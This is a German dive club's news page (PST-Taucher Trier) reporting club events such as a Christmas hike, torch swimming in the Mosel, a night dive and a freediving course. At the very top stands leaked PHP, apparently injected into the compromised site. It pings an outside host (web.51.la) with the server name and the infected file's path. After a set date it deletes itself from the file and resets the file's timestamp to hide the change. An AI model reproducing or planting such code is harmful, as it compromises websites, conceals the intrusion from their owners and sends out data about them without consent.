check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456728072){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } PST-TAUCHER TRIER

Please install Flash and turn on Javascript.

Wir haben 6 Gäste online
Seitenaufrufe : 110966
Weihnachtswanderung 2015

Feucht-fröhliche Weihnachtswanderung

Mehr als 50 PST-Taucher nahmen mit ihren Familien und Freunden an der alljährlichen Weihnachtswanderung mit anschließendem Buffet teil. Die feuchten Wetterverhältnisse hinderte die Taucherschar nicht einen kleinen Spaziergang rund um Wasserliesch durchzuführen und Glühwein, Kinderpunsch sowie Weihnachtsgebäck an der Raststation auf halber Strecke zu genießen. Nach der Stärkung ging es weiter ins Blockhaus. Hier wartete ein leckeres Buffet auf die Wanderer.

Es war wieder ein gelungenes und geselliges Vereinsevent zum Jahresabschluss. Danke an das Orga-Team.

 

 
Fackelschwimmen in Bernkastel

Alle Jahre wieder...

 

...geht es am ersten Wochenende im Dezember nach Bernkastel zum Fackelschwimmen in der Mosel. Wie jedes Jahr begleiten wir den Nikolaus auf einer Reise über die Mosel bis zur Ankunft auf dem Weihnachtsmarkt in Bernkastel. Mit 128 Teilnehmer im gesamten, davon etwa 20 PST-Taucher, war es auch bei 7 Grad kaltem Moselwasser wie immer eine tolle Atmosphäre. Natürlich war der anschliessende Gang über den Weihnachtsmarkt und ein Abschlussfoto mit dem Nikolaus auch in diesem Jahr mit dem Tauchanzug ein Highlight. Zum Abschluss fuhren wir zum Essen ins Gasthaus Crames nach Trier.

 

 
Südbad Blitz blank sauber für den Winterschlaf

Nach einem Bilderbuchsommer mit idealen Trainingsbedingungen im Südbad Trier war vor der Winterpause die alljährliche Reinigung durch die PST Taucher angesagt.

Professionell ausgestattet von der ART mit Arbeitskleidung, Mülltonnen und Besen säuberten die Taucher das für den Trainingsbetrieb vom Sportamt der Stadt Trier, vertreten durch Matthias Ulbrich und Frank Brandscheid, und den Schwimmmeisterinnen und –meistern sowie der Fa. Aquatas, vertreten durch Oliver Prinz, das zur Verfügung gestellte Bad.

Die PST Taucher danken allen Verantwortlichen für das konstruktive sowie freundliche Miteinander und freuen sich auf die Sommer-Saison 2017.

 

                                                               

 
Nachttauchen im Südbad - Training einmal anders - am 26.08.2015

 

Kurz vor Beendigung der diesjährigen Freibadsaison wurde uns die Möglichkeit geboten, das Südbad für ein Training bei Nacht zu nutzen.

Tauchen in fast völliger Dunkelheit, so dass die Tauchlampen auch einmal getestet werden konnten. So dunkel wie im See wurde es allerdings aufgrund der Reflektion des Lichtes am Beckenrand und der Außenbeleuchtung des Südbades nicht. Zunächst wurden nochmals die besonderen Unterwasserzeichen/Lichtzeichen für die Dunkelheit besprochen. Nachdem die Buddy-Teams gebildet waren, ging es hinein in das kühle Nass des Südbades und es wurden zahlreiche Runden im Becken gedreht.

Wie bei einem „echten“ Nachttauchgang wurde der Ausgang mit Licht gekennzeichnet, um den richtigen Rückweg wieder zu finden. Hierzu hatte Tim eine tolle Idee und aus Knicklichtern in verschiedenen Farben ein EXIT-Schild gebastelt, so dass wir alle wohlbehalten nach gut 30 Minuten wieder aus dem Wasser gestiegen sind.

Vielen Dank hierfür!

Für die Teilnehmer war es ein sehr schöner Abend.

Unser besonderer Dank gilt vor allem auch Oliver Prinz, dem Betriebsleiter des Südbades. Ohne seine Unterstützung über die ganze Saison hinweg und bei solchen neben den üblichen Trainingszeiten stattfindenden Veranstaltungen wäre all dies so nicht möglich.

 

 



 
Erfolgreiche Weiterbildung der Übungsleiter

Am Wochenende 22.-23.08.2015 haben wir für unsere Übungsleiter eine spezielle Apnoe-Weiterbildung angeboten. Angelo, Jürgen und Michael nutzten die Gelegenheit, ihre Apnoe-Fähigkeiten weiter unter der überaus professionellen Anleitung von Nationalkaderathletin Doris Hovermann zu beweisen und weiter auszubauen. So starteten wir am Samstag morgen um 10 Uhr im Dive4Life in Siegburg im Unterrichtsraum mit der Theorie. Ziel war es, innerhalb der beiden Tage den Apnoe** abzulegen und vor allem die für Apnoe unbedingt notwendigen Grundlagen, der Atemtechniken, Entspannung, Streching, Flossentechnik, Abtauch- und Sicherungsstandards zu erlernen, damit wir dies in unser Trainingsangebot einbauen können.

Doris verstand es, bei uns keine Langeweile aufkommen zu lassen. Nach vier Stunden Theorie und einem abschliessenden Test, den wir natürlich bravorös bestanden, ging es zum Statik-Apnoe und anschliessendem Technik des Abtauchens und Tieftauchen in den Pool. Nach einer kurzen Vorbereitung standen vier Durchgänge Statische Apnoe an, die wir alle mit nur wenigen Sekunden Unterschied knapp vor der Grenze von 3 Minuten absolvierten ("gemusst" hätten wir nur 1:30 min).

Beim Abtauchtraining starteten wir erst im Flachbereich (7m) und zogen uns beim Free Immersion (ohne Flossenbewegung mit Hilfe des Seils in die Tife ziehen und auch wieder zurück) am Seil in die Tiefe.

Da dies direkt sehr gut klappte, gingen wir schnell zum Constant Weight über, bei dem der Taucher sich mit Flossenkraft in die Tiefe bewegt. Blei darf dazu getragen werden und wird auch wieder mit nach oben gebracht. Beim Constant weight starteten wir mit einer Sarttiefe von 10m, was beim vierten Tauchgang schon auf 20m verdoppelt wurde.

Geschafft vom ersten Tag bezogen wir unsere Unterkunft und im Anschluss noch ein Restaurant um für den folgenden Tag fit zu sein.

Sonntag Morgens ging es auch um 10 Uhr wieder los, nun stand zuerst Atemtechniken, Stretching und vorbereitung auf dem Plan. Nach dem Ok vom Bademeister ging es in die 50m Bahn des Freibades, um unser Dynamik mit Flossen (also Streckentauchen mit Flossen) zu absolvieren. Die geforderten 40m wurden von jedem beim ersten Versuch abgehakt, nun galt es das Personal Best ein wenig zu verbessern. Zwei schafften sogar beim dritten Versuch eine Weite von über 60m. Da es nun langsam kalt wurde, ging es wieder ins Dive4Life um die Rettungsübungen (Retten aus 15m Apnoe) und die verbleibenden Skills zu absolvieren (Auftauchen ohne Maske, Auftauchen ohne Benutzung der Beine). Die ersten Übungstauchgänge gingen auch schon direkt wieder auf 20m, das gab einem das gute Gefühl auch die weiteren Übungen ohne Probleme zu absolvieren. Doris erklärte uns einen üblichen Trainingsablauf, wie das Sichern eines Tauchers abläuft, die Rettung, usw. . Wir waren ein gut eingespieltes Team, Doris verbesserte ein paar Kleinigkeiten bei jedem von uns.

Zum Schluss des zweiten Tages hatten wir noch ein paar Minuten Zeit ein paar Bilder zu machen.

Vielen Dank Doris Hovermann, das war wirklich eine lohnenswerte Weiterbildung für uns! Wir haben viel Mitgenommen und werden es nun auch bei uns weiterführen.

 



 
Milliuunen Taucher bei Bike&Dive & Barbecue

Die traditionelle Vereinsfahrt an den beliebten Matschelsee in Baden-Württemberg fand wie immer am ersten Juli-Wochenende statt. Bei sommerlichen Höchsttemperaturen und strahlend blauem Himmel fanden mehr als 30 Taucher und Biker den Weg an den See. Während die Biker ihre kurvenreiche Tour durch die Vogesen mit Tourguide Michael genossen, bereiteten die Autofahrer schon den Empfang am See vor. Das folgende Wochenende wurde durch ein perfektes See-Catering von Kuno mit seinem Koch Schumi begleitet und von allen Teilnehmern sehr geschätzt.

Auch ehemaligen Mitgliedern aus Hamburg war die Anreise für dieses Wochenende nicht zu weit.

Auch für die große Zahl unserer "frischen" Taucher war es eine tolle Gelegenheit mit anderen Tauchpartnern ihre ersten Erfahrungen zu sammeln. Es wurden die ersten Orientierungsübungen gemacht, Tarierung verbessert, Flossentechniken ausprobiert und natürlich auch die feierliche Übergabe von den Tauchbrevets fand statt.

Danke an alle Organisatoren, Sponsoren und Teilnehmer, für das gelungene Wochenende!

 
Danke für den tollen Nachmittag!

Am 11.01.15 war es endlich soweit: Bio-Uli Erfurth und Dr. Erich Ritter kamen zu uns für ihre Vortragsreihe "Perfekte Evolution - Haie, Tiere der Superlative". Die PSTler hatten am Abend vorher und am Vormittag schon ganze Arbeit geleistet: die Halle wurde von einer Sporthalle zu einem gemütlichen Vortragssaal gewandelt. Die Leinwand mit ihren 6m x 4m stellte sicher, dass auch die hinteren Reihen perfekte Sicht auf das Bild hatten.

Kurz vor 14 Uhr fieberten schon die ersten der Öffnung entgegen. Die Zeit bis Vortragsbeginn wurde bei einer gemütlichen Tasse Kaffee, einem Stück Kuchen oder einem Glas Wein oder Sekt und guten Gesprächen mit Freunden überbrückt. Einige nutzten auch die Gelegenheit, sich am Sea Shepherd- Stand über deren Angebot und Kampagnen zu informieren.

Kurz nach 14 Uhr begann Uli dann den Vortrag, der dann nahtlos in Erich's überging. Wir hörten viel neues, angefangen von den Sinnesorganen und den Fähigkeiten der Haie, wie und warum sie verschiedene Verhaltensweisen an den Tag legen, die "neuesten" Schutzmassnahmen aus Amerika ;-) und natürlich lernten wir auch, wie ein Taucher sich bei einer Haibegegung verhalten sollte.

Vielen Dank Uli und Erich, vielen Dank liebe PSTler für die Hilfe und natürlich Danke allen Besuchern! Bis ein anderes mal!